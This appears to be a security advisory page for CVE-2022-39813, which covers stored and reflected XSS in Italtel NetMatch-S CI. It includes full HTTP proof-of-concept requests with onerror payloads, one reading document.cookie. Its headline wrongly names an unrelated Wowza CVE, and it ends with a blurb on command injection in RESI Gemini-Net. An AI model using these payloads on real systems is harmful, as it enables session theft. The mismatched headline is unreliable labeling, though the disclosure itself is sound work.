Headline
CVE-2019-19453: Vulnerability Research & Advisor
Wowza Streaming Engine before 4.8.5 allows XSS (issue 1 of 2). An authenticated user, with access to the proxy license editing is able to insert a malicious payload that will be triggered in the main page of server settings. This issue was resolved in Wowza Streaming Engine 4.8.5.
Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813
CVSv3: 6,1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.
Step-by-step instructions and PoC.
The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
o HTTP POST Parameter: j_username
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
o HTTP POST Parameter: name, actLine
Below are the evidences with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27
The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>
The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.
Related news
resi-calltrace in RESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.